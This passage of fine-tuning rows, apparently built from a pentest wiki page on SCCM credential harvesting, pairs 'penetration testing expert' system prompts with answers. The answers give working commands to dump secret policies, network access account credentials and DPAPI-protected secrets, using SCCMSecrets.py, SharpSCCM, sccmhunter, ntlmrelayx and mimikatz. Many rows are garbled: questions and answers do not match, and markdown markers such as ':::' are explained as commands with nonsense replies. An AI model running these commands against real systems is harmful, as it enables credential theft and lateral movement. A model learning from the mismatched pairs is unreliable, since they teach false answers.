Windows-based\n\nOn Windows, SharpSCCM (C#) can be used to register a device and dump secret policies. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped.\n\n`powershell\n.\\SharpSCCM.exe get secrets -r newdevice -u $MACHINE_NAME -p $PASSWORD\n`\n\n:::\n\nInstead of registering a new device, it is also possible to use an already compromised SCCM device in order to dump secret policies. Note that this can also be interesting as the compromised device may be part of specific device collections associated with more task sequences or collect"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do HTTPS with client certificate", "response": "python3 SCCMSecrets.py policies -mp https://$MP_IP -u '$MACHINE_NAME' -p '$MACHINE_PASSWORD' -cn 'newdevice' --pki-cert ./cert.pem --pki-key ./key.pem\n``\n\nNote that if you do not provide machine account credentials, SCCMSecrets.py will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account.\n`bash\npython3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/ccm_system_windowsauth/request' -smb2support --sccm-policies -debug\n`\n\nFinally, this attack was first inspired by @xpn_'s work (refer to this blogpost). The tool associated with the blogpost, sccmwtf (Python), is available on Github. It can be used to perform the attack, however with two limitations: it will only dump the NAA secret policy, and it might fail on recent SCCM installations since the encryption algorithm changed.\n\nThe sccmhunter (Python) tool also implements sccmwtf, but with the same limitations.\n`bash\n#Create a new computer account and request the policies\npython3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto\n\n#To use an already controlled computer account\npython3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -cn $COMPUTER_NAME -cp $COMPUTER_PASSWORD -dc-ip $DC_IP\n`\n\n=== Windows-based\n\nOn Windows, SharpSCCM (C#) can be used to register a device and dump secret policies. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped.\n\n`powershell\n.\\SharpSCCM.exe get secrets -r newdevice -u $MACHINE_NAME -p $PASSWORD\n`\n\n:::\n\nInstead of registering a new device, it is also possible to use an already compromised SCCM device in order to dump secret policies. Note that this can also be interesting as the compromised device may be part of specific device collections associated with more task sequences or collect", "metadata": {"corpus_index": 1051, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Note for https with client certificate?"}, {"role": "assistant", "content": "Note that if you do not provide machine account credentials, `SCCMSecrets.py` will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Note for https with client certificate?", "response": "Note that if you do not provide machine account credentials, `SCCMSecrets.py` will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account.", "metadata": {"corpus_index": 1052, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Note"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for HTTPS with client certificate?"}, {"role": "assistant", "content": "Note that if you do not provide machine account credentials, `SCCMSecrets.py` will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for HTTPS with client certificate?", "response": "Note that if you do not provide machine account credentials, `SCCMSecrets.py` will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account.", "metadata": {"corpus_index": 1052, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Note that if you do not provide machine account credentials, `SCCMSecrets.py` will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.`?"}, {"role": "assistant", "content": "This command is used for https with client certificate. HTTPS with client certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Note that if you do not provide machine account credentials, `SCCMSecrets.py` will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.`?", "response": "This command is used for https with client certificate. HTTPS with client certificate", "metadata": {"corpus_index": 1052, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through HTTPS with client certificate"}, {"role": "assistant", "content": "Finally, this attack was first inspired by @xpn_'s work (refer to [this blogpost](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)). The tool associated with the blogpost, [sccmwtf](https://github.com/xpn/sccmwtf) (Python), is available on Github. It can be used to perform the attack, however with two limitations: it will only dump the NAA secret policy, and it might fail on recent SCCM installations since the encryption algorithm changed.\n\nThe [sccmhunter](https://github.com/garrettfoster13/sccmhunter) (Python) tool also implements `sccmwtf`, but with the same limitations."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through HTTPS with client certificate", "response": "Finally, this attack was first inspired by @xpn_'s work (refer to [this blogpost](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)). The tool associated with the blogpost, [sccmwtf](https://github.com/xpn/sccmwtf) (Python), is available on Github. It can be used to perform the attack, however with two limitations: it will only dump the NAA secret policy, and it might fail on recent SCCM installations since the encryption algorithm changed.\n\nThe [sccmhunter](https://github.com/garrettfoster13/sccmhunter) (Python) tool also implements `sccmwtf`, but with the same limitations.", "metadata": {"corpus_index": 1053, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on HTTPS with client certificate"}, {"role": "assistant", "content": "=== Windows-based\n\nOn Windows, [SharpSCCM](https://github.com/Mayyhem/SharpSCCM) (C#) can be used to register a device and dump secret policies. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on HTTPS with client certificate", "response": "=== Windows-based\n\nOn Windows, [SharpSCCM](https://github.com/Mayyhem/SharpSCCM) (C#) can be used to register a device and dump secret policies. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped.", "metadata": {"corpus_index": 1054, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows-based`?"}, {"role": "assistant", "content": "This command is used for https with client certificate. HTTPS with client certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows-based`?", "response": "This command is used for https with client certificate. HTTPS with client certificate", "metadata": {"corpus_index": 1054, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for HTTPS with client certificate"}, {"role": "assistant", "content": ":::\n\nInstead of registering a new device, it is also possible to **use an already compromised SCCM device** in order to dump secret policies. Note that this can also be interesting as the compromised device may be part of specific device collections associated with more task sequences or collection variables than the default collections we dumped by registering a device ourselves.\n\n::: tabs\n\n=== Unix-based\n\nIn order to use a compromised SCCM device, it is first necessary to **extract the SCCM certificates** from the machine. More details on how to do this [here](https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial#part_4).\n\nWith the SCCM device private key and GUID, [SCCMSecrets.py](https://github.com/synacktiv/SCCMSecrets/) (Python) can be used to impersonate the device and dump secret policies (in the example below, the `compromised_device/` folder contains the `key.pem` and `guid.txt` files).\n\nAll secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for HTTPS with client certificate", "response": ":::\n\nInstead of registering a new device, it is also possible to **use an already compromised SCCM device** in order to dump secret policies. Note that this can also be interesting as the compromised device may be part of specific device collections associated with more task sequences or collection variables than the default collections we dumped by registering a device ourselves.\n\n::: tabs\n\n=== Unix-based\n\nIn order to use a compromised SCCM device, it is first necessary to **extract the SCCM certificates** from the machine. More details on how to do this [here](https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial#part_4).\n\nWith the SCCM device private key and GUID, [SCCMSecrets.py](https://github.com/synacktiv/SCCMSecrets/) (Python) can be used to impersonate the device and dump secret policies (in the example below, the `compromised_device/` folder contains the `key.pem` and `guid.txt` files).\n\nAll secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped.", "metadata": {"corpus_index": 1055, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `:::`?"}, {"role": "assistant", "content": "This command is used for https with client certificate. HTTPS with client certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `:::`?", "response": "This command is used for https with client certificate. HTTPS with client certificate", "metadata": {"corpus_index": 1055, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Plain HTTP"}, {"role": "assistant", "content": "python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Plain HTTP", "response": "python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/", "metadata": {"corpus_index": 1056, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Plain HTTP"}, {"role": "assistant", "content": "python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Plain HTTP", "response": "python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/", "metadata": {"corpus_index": 1056, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about HTTPS with client certificate authentication?"}, {"role": "assistant", "content": "python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/ --pki-cert cert.pem --pki-key key.pem\n``\n\n=== Windows-based\n\nFrom a local administrator access on the machine of a compromised SCCM device, SharpSCCM (C#) can be executed to use the local SCCM device and dump secret policies.\n\nAll secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped.\n\n`powershell\n.\\SharpSCCM.exe get secrets\n`\n\n:::\n\nFinally, it should be mentioned that SCCM policies secrets (NAA, Task Sequences, Collection variables) are stored on the disk of SCCM clients, encrypted with DPAPI. Interestingly enough regarding NAA, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers (see this SpecterOps article). The same behaviour can be observed for Task sequences and Collection variables.\n\nAs a result, it is possible to retrieve policies secrets locally on compromised devices.\n\n::: tabs\n\n=== UNIX-based\n\nUsing a local administrator account, SystemDPAPIdump.py (Python) can be used to fetch and decrypt SCCM policies secrets locally, as well as sccmhunter.py (Python).\n\n`bash\nSystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@target.$DOMAIN\n`\n\n`bash\npython3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET -wmi\n`\n\n=== Windows-based\n\nWith administrative access to a Windows machine enrolled in the SCCM environment, SharpSCCM (C#), SharpDPAPI (C#), Mimikatz (C) or native PowerShell can be used to extract policies secrets locally.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about HTTPS with client certificate authentication?", "response": "python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/ --pki-cert cert.pem --pki-key key.pem\n``\n\n=== Windows-based\n\nFrom a local administrator access on the machine of a compromised SCCM device, SharpSCCM (C#) can be executed to use the local SCCM device and dump secret policies.\n\nAll secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped.\n\n`powershell\n.\\SharpSCCM.exe get secrets\n`\n\n:::\n\nFinally, it should be mentioned that SCCM policies secrets (NAA, Task Sequences, Collection variables) are stored on the disk of SCCM clients, encrypted with DPAPI. Interestingly enough regarding NAA, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers (see this SpecterOps article). The same behaviour can be observed for Task sequences and Collection variables.\n\nAs a result, it is possible to retrieve policies secrets locally on compromised devices.\n\n::: tabs\n\n=== UNIX-based\n\nUsing a local administrator account, SystemDPAPIdump.py (Python) can be used to fetch and decrypt SCCM policies secrets locally, as well as sccmhunter.py (Python).\n\n`bash\nSystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@target.$DOMAIN\n`\n\n`bash\npython3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET -wmi\n`\n\n=== Windows-based\n\nWith administrative access to a Windows machine enrolled in the SCCM environment, SharpSCCM (C#), SharpDPAPI (C#), Mimikatz (C) or native PowerShell can be used to extract policies secrets locally.\n\n``powershell", "metadata": {"corpus_index": 1057, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for HTTPS with client certificate authentication"}, {"role": "assistant", "content": "python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/ --pki-cert cert.pem --pki-key key.pem\n``\n\n=== Windows-based\n\nFrom a local administrator access on the machine of a compromised SCCM device, SharpSCCM (C#) can be executed to use the local SCCM device and dump secret policies.\n\nAll secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped.\n\n`powershell\n.\\SharpSCCM.exe get secrets\n`\n\n:::\n\nFinally, it should be mentioned that SCCM policies secrets (NAA, Task Sequences, Collection variables) are stored on the disk of SCCM clients, encrypted with DPAPI. Interestingly enough regarding NAA, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers (see this SpecterOps article). The same behaviour can be observed for Task sequences and Collection variables.\n\nAs a result, it is possible to retrieve policies secrets locally on compromised devices.\n\n::: tabs\n\n=== UNIX-based\n\nUsing a local administrator account, SystemDPAPIdump.py (Python) can be used to fetch and decrypt SCCM policies secrets locally, as well as sccmhunter.py (Python).\n\n`bash\nSystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@target.$DOMAIN\n`\n\n`bash\npython3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET -wmi\n`\n\n=== Windows-based\n\nWith administrative access to a Windows machine enrolled in the SCCM environment, SharpSCCM (C#), SharpDPAPI (C#), Mimikatz (C) or native PowerShell can be used to extract policies secrets locally.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for HTTPS with client certificate authentication", "response": "python3 SCCMSecrets.py policies -mp http://$MP_IP --use-existing-device compromised_device/ --pki-cert cert.pem --pki-key key.pem\n``\n\n=== Windows-based\n\nFrom a local administrator access on the machine of a compromised SCCM device, SharpSCCM (C#) can be executed to use the local SCCM device and dump secret policies.\n\nAll secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped.\n\n`powershell\n.\\SharpSCCM.exe get secrets\n`\n\n:::\n\nFinally, it should be mentioned that SCCM policies secrets (NAA, Task Sequences, Collection variables) are stored on the disk of SCCM clients, encrypted with DPAPI. Interestingly enough regarding NAA, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers (see this SpecterOps article). The same behaviour can be observed for Task sequences and Collection variables.\n\nAs a result, it is possible to retrieve policies secrets locally on compromised devices.\n\n::: tabs\n\n=== UNIX-based\n\nUsing a local administrator account, SystemDPAPIdump.py (Python) can be used to fetch and decrypt SCCM policies secrets locally, as well as sccmhunter.py (Python).\n\n`bash\nSystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@target.$DOMAIN\n`\n\n`bash\npython3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET -wmi\n`\n\n=== Windows-based\n\nWith administrative access to a Windows machine enrolled in the SCCM environment, SharpSCCM (C#), SharpDPAPI (C#), Mimikatz (C) or native PowerShell can be used to extract policies secrets locally.\n\n``powershell", "metadata": {"corpus_index": 1057, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for HTTPS with client certificate authentication?"}, {"role": "assistant", "content": "=== Windows-based\n\nFrom a local administrator access on the machine of a compromised SCCM device, [SharpSCCM](https://github.com/Mayyhem/SharpSCCM) (C#) can be executed to use the local SCCM device and dump secret policies.\n\nAll secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for HTTPS with client certificate authentication?", "response": "=== Windows-based\n\nFrom a local administrator access on the machine of a compromised SCCM device, [SharpSCCM](https://github.com/Mayyhem/SharpSCCM) (C#) can be executed to use the local SCCM device and dump secret policies.\n\nAll secret policies associated with the compromised device's collections (including NAAs, Task sequences and collection variables) will be dumped.", "metadata": {"corpus_index": 1058, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows-based`?"}, {"role": "assistant", "content": "This command is used for https with client certificate authentication. HTTPS with client certificate authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows-based`?", "response": "This command is used for https with client certificate authentication. HTTPS with client certificate authentication", "metadata": {"corpus_index": 1058, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute HTTPS with client certificate authentication?"}, {"role": "assistant", "content": ":::\n\nFinally, it should be mentioned that SCCM policies secrets (NAA, Task Sequences, Collection variables) are stored on the disk of SCCM clients, encrypted with DPAPI. Interestingly enough regarding NAA, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers (see [this SpecterOps article](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)). The same behaviour can be observed for Task sequences and Collection variables.\n\nAs a result, it is possible to retrieve policies secrets **locally** on compromised devices.\n\n::: tabs\n\n=== UNIX-based\n\nUsing a local administrator account, [SystemDPAPIdump.py](https://github.com/fortra/impacket/pull/1137) (Python) can be used to fetch and decrypt SCCM policies secrets locally, as well as [sccmhunter.py](https://github.com/garrettfoster13/sccmhunter) (Python)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute HTTPS with client certificate authentication?", "response": ":::\n\nFinally, it should be mentioned that SCCM policies secrets (NAA, Task Sequences, Collection variables) are stored on the disk of SCCM clients, encrypted with DPAPI. Interestingly enough regarding NAA, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains the encrypted credentials on the enrolled computers (see [this SpecterOps article](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)). The same behaviour can be observed for Task sequences and Collection variables.\n\nAs a result, it is possible to retrieve policies secrets **locally** on compromised devices.\n\n::: tabs\n\n=== UNIX-based\n\nUsing a local administrator account, [SystemDPAPIdump.py](https://github.com/fortra/impacket/pull/1137) (Python) can be used to fetch and decrypt SCCM policies secrets locally, as well as [sccmhunter.py](https://github.com/garrettfoster13/sccmhunter) (Python).", "metadata": {"corpus_index": 1059, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `:::`?"}, {"role": "assistant", "content": "This command is used for https with client certificate authentication. HTTPS with client certificate authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `:::`?", "response": "This command is used for https with client certificate authentication. HTTPS with client certificate authentication", "metadata": {"corpus_index": 1059, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on HTTPS with client certificate authentication"}, {"role": "assistant", "content": "```bash\npython3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET -wmi"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on HTTPS with client certificate authentication", "response": "```bash\npython3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET -wmi", "metadata": {"corpus_index": 1060, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: ````bash`?"}, {"role": "assistant", "content": "This command is used for https with client certificate authentication. HTTPS with client certificate authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: ````bash`?", "response": "This command is used for https with client certificate authentication. HTTPS with client certificate authentication", "metadata": {"corpus_index": 1060, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Mimikatz?"}, {"role": "assistant", "content": "mimikatz.exe\nmimikatz # privilege::debug\nmimikatz # token::elevate\nmimikatz # dpapi::sccm"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Mimikatz?", "response": "mimikatz.exe\nmimikatz # privilege::debug\nmimikatz # token::elevate\nmimikatz # dpapi::sccm", "metadata": {"corpus_index": 1061, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Mimikatz?"}, {"role": "assistant", "content": "mimikatz.exe\nmimikatz # privilege::debug\nmimikatz # token::elevate\nmimikatz # dpapi::sccm"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Mimikatz?", "response": "mimikatz.exe\nmimikatz # privilege::debug\nmimikatz # token::elevate\nmimikatz # dpapi::sccm", "metadata": {"corpus_index": 1061, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": 